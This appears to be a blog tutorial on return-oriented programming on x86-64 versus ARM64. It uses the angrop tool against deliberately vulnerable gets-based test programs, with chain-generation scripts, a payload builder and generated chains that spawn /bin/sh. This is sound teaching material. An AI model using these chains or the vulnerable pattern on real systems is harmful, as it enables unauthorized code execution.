Return-oriented programming (ROP) is fairly trivial on architectures like x86-64 that have stack-based returns, which transfer control to a return address located on the stack. On ARM64, however, software can't write directly to the program counter. It can only be updated through branches, exception entries, and exception returns. This makes stack-based returns in the x86-64 sense impossible.
This key architectural difference means that ROP chains are structured differently on x86-64 and ARM64. It also makes crafting such chains by hand far less practical, and instead lends itself to using ROP chain generators.
On x86-64, typical ROP gadgets end with a ret instruction, which pops the value at the top of the stack (pointed to by rsp) into the program counter rip. This makes gadget chaining easy. The stack pointer acts as a quasi program counter, so it automatically advances to the next gadget on the stack.
Below is a hypothetical stack view of an x86-64 ROP chain that writes 0xdeadbeef to rdi and 0xfeedface to rsi:

```
0x0000000000000000: pop %rdi; ret
0x0000000000000008: 0xdeadbeef
0x0000000000000010: pop %rsi; ret
0x0000000000000018: 0xfeedface
```

Here's how the ROP chain executes:

1. ret transfers control to the address at 0x0. Now the stack pointer is at 0x8.
2. pop %rdi pops 0xdeadbeef into rdi. Now the stack pointer is at 0x10.
3. ret transfers control to the address at 0x10. Now the stack pointer is at 0x18.
4. pop %rsi pops 0xfeedface into rsi. Now the stack pointer is at 0x20.
5. ret transfers control to the address at 0x20. Now the stack pointer is at 0x28.

On architectures with stack-based returns, ROP chains chain themselves together automatically, because the return instruction transfers control to the next gadget on the stack. You just place all your gadgets on the stack, padding where necessary, and they execute in that order.
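To make the "automatic" part concrete, here is a toy Python model of the hypothetical x86-64 chain above. It is an illustration and not an emulator. The stack is a list of 8-byte slots and rsp is a byte offset into it. A gadget's "address" is just its disassembly string, which is an assumption made purely for readability. Neither gadget body mentions the next gadget. The modeled ret (popping the next slot into rip) does all the chaining. For simplicity, the model stops when the chain runs out rather than executing the final ret.

```python
from dataclasses import dataclass, field

@dataclass
class CPU:
    stack: list                                # 8-byte slots; slot i is at offset i * 8
    rsp: int = 0                               # byte offset of the top of the stack
    regs: dict = field(default_factory=dict)

    def pop(self):
        value = self.stack[self.rsp // 8]
        self.rsp += 8
        return value

def pop_into(reg):
    # Body of a "pop %reg; ret" gadget; the trailing ret is modeled in run().
    def body(cpu):
        cpu.regs[reg] = cpu.pop()
    return body

# In this toy model a gadget's "address" is just its disassembly.
GADGETS = {
    "pop %rdi; ret": pop_into("rdi"),
    "pop %rsi; ret": pop_into("rsi"),
}

def run(stack):
    cpu = CPU(stack)
    while cpu.rsp // 8 < len(cpu.stack):
        rip = cpu.pop()        # ret: pop the next slot into rip, advancing rsp
        GADGETS[rip](cpu)      # execute the gadget body
    return cpu

cpu = run(["pop %rdi; ret", 0xdeadbeef, "pop %rsi; ret", 0xfeedface])
print({reg: hex(val) for reg, val in cpu.regs.items()}, hex(cpu.rsp))
# {'rdi': '0xdeadbeef', 'rsi': '0xfeedface'} 0x20
```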
ARM64 has a ret instruction too. However, it doesn't pop a return address off the stack into the program counter pc. Instead, it branches to the address in the link register lr (x30). Simple gadgets still end with a ret instruction. However, each gadget has to advance to the next one manually by setting lr itself. Since ret is really just a branch, you can substitute it with any indirect branch, such as br x16, as long as you control the destination register.
Below is a hypothetical stack view of an ARM64 ROP chain that writes 0xdeadbeef to x0 and 0xfeedface to x1:

```
0x0000000000000000: ldr x0, [sp]; ldr lr, [sp, #0x8]; add sp, sp, #0x10; ret
0x0000000000000008: 0xdeadbeef
0x0000000000000010: ldr x1, [sp]; ldr lr, [sp, #0x8]; add sp, sp, #0x10; ret
0x0000000000000018: 0xfeedface
```

Here's how the ROP chain executes:

1. ret transfers control to the gadget at 0x0, whose address is in lr. Now the stack pointer is at 0x8.
2. ldr x0, [sp] loads 0xdeadbeef into x0.
3. ldr lr, [sp, #0x8] loads the value at 0x10 into lr.
4. add sp, sp, #0x10 advances the stack pointer to 0x18.
5. ret transfers control to the address in lr.
6. ldr x1, [sp] loads 0xfeedface into x1.
7. ldr lr, [sp, #0x8] loads the value at 0x20 into lr.
8. add sp, sp, #0x10 advances the stack pointer to 0x28.
9. ret transfers control to the address in lr.

Notice how the gadgets have to chain themselves together manually. Each one has to get the address of the next gadget into lr before ret is executed.
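Here is the same kind of toy Python model for the hypothetical ARM64 chain, again an illustration rather than an emulator. Each modeled gadget loads its register from [sp], loads the next gadget's address from [sp, #0x8] into lr, and advances sp by 0x10. The stack pointer starts at 0x8, as in the walkthrough. The gadget names and the None placeholder for whatever sits at 0x20 are assumptions made for readability. The key difference from the x86-64 model is that the modeled ret pops nothing. It only branches to lr, so each gadget body has to fetch the next address itself.

```python
from dataclasses import dataclass, field

@dataclass
class CPU:
    stack: list                                # 8-byte slots; slot i is at offset i * 8
    sp: int = 0x8                              # sp when the first gadget starts running
    lr: object = None
    regs: dict = field(default_factory=dict)

    def load(self, offset):
        # ldr from [sp, #offset]; unlike pop, this does NOT move sp
        return self.stack[(self.sp + offset) // 8]

def load_then_link(reg):
    # Models a gadget that loads reg from [sp], loads lr from [sp, #0x8],
    # adds 0x10 to sp, then rets. Returns the branch target (the new lr).
    def body(cpu):
        cpu.regs[reg] = cpu.load(0)
        cpu.lr = cpu.load(0x8)   # the gadget itself must fetch the next address
        cpu.sp += 0x10
        return cpu.lr            # ret just branches to lr
    return body

GADGETS = {
    "x0 gadget": load_then_link("x0"),
    "x1 gadget": load_then_link("x1"),
}

def run(stack):
    cpu = CPU(stack)
    cpu.lr = stack[0]            # the first gadget's address, already in lr
    target = cpu.lr
    while target in GADGETS:
        target = GADGETS[target](cpu)
    return cpu

# None stands in for whatever sits at 0x20, just past the chain.
cpu = run(["x0 gadget", 0xdeadbeef, "x1 gadget", 0xfeedface, None])
print({reg: hex(val) for reg, val in cpu.regs.items()}, hex(cpu.sp))
# {'x0': '0xdeadbeef', 'x1': '0xfeedface'} 0x28
```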
Unfortunately, you'll rarely, if ever, find gadgets like these in the wild: gadgets that advance the stack pointer up the stack perfectly. The offsets you see here for loads and stores were chosen for simplicity. In practice, the stack offsets in loads and stores are often rather large, and the padding this requires makes the chain larger.
Normally, I write ROP chains manually. This means running ROPgadget on the relevant binaries and then combing through their gadgets to build up a chain. This works fine for architectures where you're likely to find simple gadgets with no side effects or dependencies. However, these sorts of gadgets rarely exist in ARM64 binaries. Take the glibc on my system, for example, a supposed trove of gadgets. On x86-64, say you want to set rdi to a value. That's no problem: pop rdi; ret exists. Want to set rsi too? pop rsi; ret exists. On ARM64, say you want to set x0 to a value. Well, you have ldr x0, [sp, #0x10]; ldp fp, lr, [sp], #0x20; ret. But then say you want to set x1 too. Now the gadgets become more constrained. ldr x1, [sp, #0x20]; add sp, sp, #0xb0; br x16 was literally the nicest gadget I could find. However, it requires you to control x16 to continue your chain, so that's yet another gadget you'll have to find. And what if that gadget requires you to control a different register? The dependencies just keep on growing.
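The dependency problem can be sketched as a tiny recursive planner in Python. The first two gadgets are the real glibc ones quoted above. The two marked "(hypothetical)" are made up to show how one extra requirement (controlling x16 for br x16) pulls in more gadgets. This toy ignores the hard parts a real tool such as angrop must model, namely clobbered registers, side effects, and stack layout. It only orders gadgets so that each gadget's dependencies are set before it runs.

```python
# Toy gadget table: which registers each gadget sets from the stack, and which
# registers must already be under our control before it can be used.
GADGETS = [
    {"insns": "ldr x0, [sp, #0x10]; ldp fp, lr, [sp], #0x20; ret",
     "sets": {"x0"}, "needs": set()},
    {"insns": "ldr x1, [sp, #0x20]; add sp, sp, #0xb0; br x16",
     "sets": {"x1"}, "needs": {"x16"}},      # br x16: we must control x16
    # Hypothetical gadgets, made up to show how dependencies pile up:
    {"insns": "(hypothetical) mov x16, x17; ...; ret",
     "sets": {"x16"}, "needs": {"x17"}},
    {"insns": "(hypothetical) ldr x17, [sp, ...]; ...; ret",
     "sets": {"x17"}, "needs": set()},
]

def plan(wanted, chain=None, pending=frozenset()):
    """Return gadgets, in order, that set every register in `wanted`, with each
    gadget placed after the gadgets its dependencies require. Ignores clobbered
    registers and stack layout."""
    chain = [] if chain is None else chain
    for reg in sorted(wanted):
        if reg in pending:
            raise ValueError(f"circular dependency on {reg}")
        gadget = next((g for g in GADGETS if reg in g["sets"]), None)
        if gadget is None:
            raise ValueError(f"no gadget sets {reg}")
        if gadget["insns"] not in chain:
            plan(gadget["needs"], chain, pending | {reg})  # dependencies first
            chain.append(gadget["insns"])
    return chain

for step in plan({"x0", "x1"}):
    print(step)
```

Asking for x0 alone yields a single gadget. Asking for x1 as well drags in two more, and every extra requirement in a real binary can do the same.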
I wondered if there was a better, more automated way to write ROP chains. Was there something like angr, but for ROP? A tool where I could say "here is a set of gadgets, now find the sequence of gadgets which results in this state"? Well, it turns out that exact tool exists: angrop.
angrop's made by the same great people who made
angr. It's built on top of angr's
symbolic execution engine, and uses constraint solving for
generating ROP chains. Most importantly, it understands the effects
of gadgets.
I wrote test programs for x86-64 and ARM64 to test angrop's ROP chain generation. Each test program was statically linked with glibc and had a vulnerable function, vuln, which called gets with the current stack frame's base as its argument. I wanted to see if I could generate a ROP chain that would write "/bin/sh" to writable memory and make an execve system call with it.
It's important to note that although the test programs are statically linked with glibc, they don't include all of glibc's gadgets, because the linker only pulls in the parts of glibc that the program actually uses. Nevertheless, there'll still be more than enough to play with.
Here's the architecture-independent program:

```c
extern void vuln();

int main() {
    vuln();
}
```
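Here's the x86-64 vulnerable function:

```asm
    .global vuln
    .type vuln, @function
vuln:
    push %rbp           # save the caller's frame pointer
    mov %rsp, %rbp      # rbp points at the saved rbp; the return address is at 8(%rbp)
    mov %rbp, %rdi      # gets() writes its input starting at the frame base...
    call gets           # ...with no bounds check, so it can overwrite the return address
    pop %rbp
    ret                 # returns to whatever now sits in the return address slot
    .size vuln, .-vuln
```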
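And here's the ARM64 vulnerable function:

```asm
    .global vuln
    .type vuln, @function
vuln:
    stp fp, lr, [sp, #-16]!   // push the frame record (saved fp and lr)
    mov x0, sp                // gets() writes starting at the saved fp...
    bl gets                   // ...and can overwrite the saved lr just above it
    ldp fp, lr, [sp], #16     // reload fp and the (possibly overwritten) lr
    ret                       // branch to lr
    .size vuln, .-vuln
```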
Each program using angrop typically begins with the following:

```python
import angr, angrop

p = angr.Project("pathname")
rop = p.analyses.ROP()
```
Similar to using angr, the first step is to load a
binary into a project. Then, to use angrop, you need
to instantiate an angrop.ROP object for gadget
finding.
At this point, angrop isn't aware of any gadgets. You can either search the binary for them or import them. You'll need to search the binary at least once. However, searching takes a while and there's no gadget cache, so you'll also want to save the gadgets:
```python
rop.find_gadgets()
rop.save_gadgets("gadgets")
```
Now on subsequent runs, you can replace the above lines with:
```python
rop.load_gadgets("gadgets")
```
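Instead of editing the script between runs, you can fold both cases into one helper. This is a minimal sketch that uses only the find_gadgets, save_gadgets and load_gadgets calls shown above. It assumes that save_gadgets writes its file to exactly the path it's given, so that os.path.exists can detect a previous save. The helper name load_or_find_gadgets is hypothetical.

```python
import os

def load_or_find_gadgets(rop, path="gadgets"):
    """Load gadgets from `path` if an earlier run saved them; otherwise search
    the binary once and save the result for next time.

    `rop` is the object returned by p.analyses.ROP(). Assumes save_gadgets()
    writes its file to exactly `path`.
    """
    if os.path.exists(path):
        rop.load_gadgets(path)
        return "loaded"
    rop.find_gadgets()       # slow: only done on the first run
    rop.save_gadgets(path)
    return "found"
```

Usage would then be rop = p.analyses.ROP() followed by load_or_find_gadgets(rop). Delete the saved file whenever the binary changes, because the helper has no way to tell that the cached gadgets are stale.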
With these gadgets, you can construct a ROP chain using angr's symbolic execution engine. angrop provides helper functions that, among other things, can set registers, call functions, and write to memory.
Here's how you'd create the x86-64 ROP chain:

```python
obj = p.loader.main_object
# Use the start of the first writable segment as scratch space for "/bin/sh"
segment = next(s for s in obj.segments if s.is_writable)
syscall_gadget = next(g for g in rop.syscall_gadgets if g.dstr() == "syscall ; ret ")

chain = rop.write_to_mem(segment.vaddr, b"/bin/sh\x00")
# execve("/bin/sh", NULL, NULL): execve is system call 59 on x86-64, passed in rax
chain += rop.set_regs(rax=59, rdi=segment.vaddr, rsi=0, rdx=0)
chain.add_gadget(syscall_gadget)
```
And here's how you'd create the ARM64 ROP chain:

```python
obj = p.loader.main_object
# Use the start of the first writable segment as scratch space for "/bin/sh"
segment = next(s for s in obj.segments if s.is_writable)
syscall_gadget = next(g for g in rop.syscall_gadgets if g.dstr() == "svc #0; ret ")

chain = rop.write_to_mem(segment.vaddr, b"/bin/sh\x00")
# execve("/bin/sh", NULL, NULL): execve is system call 221 on ARM64, passed in x8
chain += rop.set_regs(x8=221, x0=segment.vaddr, x1=0, x2=0)
chain.add_gadget(syscall_gadget)
```
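A chain still has to make it past gets. In both vuln functions, gets starts writing at the saved frame pointer. That means 8 bytes of filler come first, and the next 8 bytes land in the saved return address (x86-64) or the saved lr (ARM64), which is where the chain's first gadget address belongs. gets also stops reading at a newline, so the payload must not contain a 0x0a byte. The sketch below covers both points. In the angrop versions I know of, RopChain.payload_str() returns the chain as bytes, but treat that as an assumption and check your version. The build_payload helper and the gadget addresses in the demo are hypothetical. Only 0x497f68 and the "/bin/sh" qword come from the generated x86-64 chain.

```python
import struct

def build_payload(chain_bytes, filler=b"A" * 8):
    """Prepend filler for the saved frame pointer and make sure gets() will
    read the entire chain."""
    data = filler + chain_bytes
    if b"\n" in data:
        # gets() stops at the first newline, so the rest would be lost.
        raise ValueError("payload contains a newline byte (0x0a)")
    return data + b"\n"   # the newline ends gets()' read; gets() stores a NUL in its place

# Hypothetical gadget addresses (0x401000, 0x401010) mixed with real chain values.
chain_bytes = struct.pack("<4Q", 0x401000, 0x497f68, 0x401010, 0x68732f6e69622f)
payload = build_payload(chain_bytes)
print(len(payload))  # 41
```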
The above ROP chain generation code only works if there are enough gadgets to satisfy the chain's constraints, and that depends entirely on which gadgets the gadget finder finds. The gadget finder class angrop.ROP accepts several arguments in its constructor to configure the search. I found that the defaults worked perfectly for x86-64. However, that wasn't the case for ARM64.
I had to change the instantiation to:

```python
rop = p.analyses.ROP(fast_mode=False, max_block_size=64)
```
The issue was caused by the default value of the max_block_size argument, which controls the maximum gadget length in bytes. For x86-64, the default is 12. That's fine, since x86-64 gadgets aren't typically long and x86-64's variable-length instructions let common gadgets fit in just a few bytes. For ARM64, the default is 40. With a fixed instruction length of 4 bytes, this means a gadget can contain at most 10 instructions. That may seem like enough, but as you've seen, ARM64 gadgets aren't pretty: they can be long. And in glibc, long they are.

I noticed that the gadget finder wasn't able to set x0 even though such a gadget existed. However, that gadget was over 10 instructions long! Setting the value to 64, which allows up to 16 instructions, turned out to be more reasonable: it found better, if more complicated, gadgets. I also had to set fast_mode to False to prevent max_block_size from being overridden. The only trade-off of a larger maximum block size was search speed, but that's fine since you only have to search once.
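The arithmetic behind those limits is easy to check side by side. Every AArch64 instruction is 4 bytes long, so max_block_size divided by 4 gives the maximum number of ARM64 instructions in a gadget. For contrast, the snippet also shows the byte encodings of two x86-64 gadgets that appear in the generated x86-64 chain later on (pop %rdi is 0x5f, pop %rax/%rdx/%rbx are 0x58/0x5a/0x5b, ret is 0xc3). Both fit comfortably in the 12-byte default. The helper name max_arm64_insns is my own.

```python
ARM64_INSN_BYTES = 4  # AArch64 instructions are always 4 bytes long

def max_arm64_insns(max_block_size):
    """Number of AArch64 instructions that fit in max_block_size bytes."""
    return max_block_size // ARM64_INSN_BYTES

# x86-64 encodings of two gadgets from the generated x86-64 chain.
X86_GADGETS = {
    "pop %rdi; ret": bytes.fromhex("5f c3"),
    "pop %rax; pop %rdx; pop %rbx; ret": bytes.fromhex("58 5a 5b c3"),
}

for size in (40, 64):
    print(f"max_block_size={size}: up to {max_arm64_insns(size)} ARM64 instructions")
for text, code in X86_GADGETS.items():
    print(f"{text}: {len(code)} bytes")
```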
In the end, angrop successfully generated ROP chains that pop a shell on both architectures.
Here's the generated x86-64 ROP chain:

```
0x0000000000000000: pop %rdi; ret
0x0000000000000008: 0x497f68
0x0000000000000010: pop %rsi; add $0x9340, %eax; ret
0x0000000000000018: 0x68732f6e69622f
0x0000000000000020: mov %rsi, 0x98(%rdi); ret
0x0000000000000028: pop %rdi; ret
0x0000000000000030: 0x498000
0x0000000000000038: pop %rsi; ret
0x0000000000000040: 0x0
0x0000000000000048: pop %rax; pop %rdx; pop %rbx; ret
0x0000000000000050: 0x3b
0x0000000000000058: 0x0
0x0000000000000060: 0x0
0x0000000000000068: syscall; ret
```
And here's the ARM64 ROP chain:

```
0x0000000000000000: ldr x2, [sp, #0x18]; ldp fp, lr, [sp], #0x20; add x0, x0, x2; ret
0x0000000000000008: 0x0
0x0000000000000010: ldr x3, [sp, #0x10]; mov x0, x3; ldp fp, lr, [sp], #0x40; ret
0x0000000000000018: 0x0
0x0000000000000020: 0x48ffd0
0x0000000000000028: 0x0
0x0000000000000030: str x0, [x2, #0x30]; mov w0, #0; ldp fp, lr, [sp], #0x20; ret
0x0000000000000038: 0x68732f6e69622f
0x0000000000000040: 0x0
0x0000000000000048: 0x0
0x0000000000000050: 0x0
0x0000000000000058: 0x0
0x0000000000000060: 0x0
0x0000000000000068: 0x0
0x0000000000000070: ldr x2, [sp, #0x18]; ldp fp, lr, [sp], #0x20; mov x0, x2; ret
0x0000000000000078: 0x0
0x0000000000000080: 0x0
0x0000000000000088: 0x0
0x0000000000000090: mov x16, x0; ldp q0, q1, [sp, #0x50]; ldp q2, q3, [sp, #0x70]; ldp q4, q5, [sp, #0x90]; ldp q6, q7, [sp, #0xb0]; ldp x0, x1, [sp, #0x40]; ldp x2, x3, [sp, #0x30]; ldp x4, x5, [sp, #0x20]; ldp x6, x7, [sp, #0x10]; ldp x8, x9, [sp], #0xd0; ldp x17, lr, [sp], #0x10; br x16
0x0000000000000098: 0x0
0x00000000000000a0: svc #0; ret
0x00000000000000a8: 0xdd
0x00000000000000b0: 0x0
0x00000000000000b8: 0x0
0x00000000000000c0: 0x0
0x00000000000000c8: 0x0
0x00000000000000d0: 0x0
0x00000000000000d8: 0x0
0x00000000000000e0: 0x0
0x00000000000000e8: 0x490000
0x00000000000000f0: 0x0
0x00000000000000f8: 0x0
0x0000000000000100: 0x0
0x0000000000000108: 0x0
0x0000000000000110: 0x0
0x0000000000000118: 0x0
0x0000000000000120: 0x0
0x0000000000000128: 0x0
0x0000000000000130: 0x0
0x0000000000000138: 0x0
0x0000000000000140: 0x0
0x0000000000000148: 0x0
0x0000000000000150: 0x0
0x0000000000000158: 0x0
0x0000000000000160: 0x0
0x0000000000000168: 0x0
0x0000000000000170: 0x0
0x0000000000000178: 0x0
0x0000000000000180: 0x0
```
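Both chains are easier to follow once a few of their constants are decoded. This short Python check is my own and was not produced by angrop. It confirms that 0x68732f6e69622f packs little-endian into "/bin/sh\x00". It also confirms that each chain's store lands at the address later loaded as the execve path: 0x497f68 + 0x98 on x86-64 and 0x48ffd0 + 0x30 on ARM64. The ARM64 case takes the str gadget's offset to be #0x30, which matches the other #0x30 offsets in the ldp sequence at 0x90. Finally, 0x3b and 0xdd are 59 and 221, the execve system call numbers placed in rax and x8.

```python
import struct

# The qword both chains store: little-endian, it spells "/bin/sh" plus a NUL
# terminator (the value's top byte is zero).
BIN_SH = 0x68732f6e69622f
print(struct.pack("<Q", BIN_SH))  # b'/bin/sh\x00'

# x86-64: pop %rdi loads 0x497f68; mov %rsi, 0x98(%rdi) stores at rdi + 0x98.
x86_target = 0x497f68 + 0x98
# ARM64: x2 is loaded with 0x48ffd0; str x0, [x2, #0x30] stores at x2 + 0x30.
arm64_target = 0x48ffd0 + 0x30
print(hex(x86_target), hex(arm64_target))  # 0x498000 0x490000

# execve system call numbers loaded into rax (x86-64) and x8 (ARM64).
print(0x3b, 0xdd)  # 59 221
```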
Both are impressive, but I was far more impressed by the ARM64 chain. It's faster to just throw it at the binary than to try to analyze it statically. I mean, just look at the mammoth gadget at 0x90! It's like looking at the output of a compiler: some things just aren't immediately clear at all. But the compiler, or in this case angrop, can see right through it.
I've come to the conclusion that practical ROP is just harder on ARM64 than on x86-64. Now, I'm no ROP historian, but maybe the technique was first discovered on an architecture with stack-based returns. I don't know; part of me just feels like it was made for the x86 architecture family.
So, if you're ever knee-deep in crafting an x86-64 ROP chain and things are getting a bit hairy, just remember that it could be worse. You could be knee-deep in crafting an ARM64 ROP chain without angrop.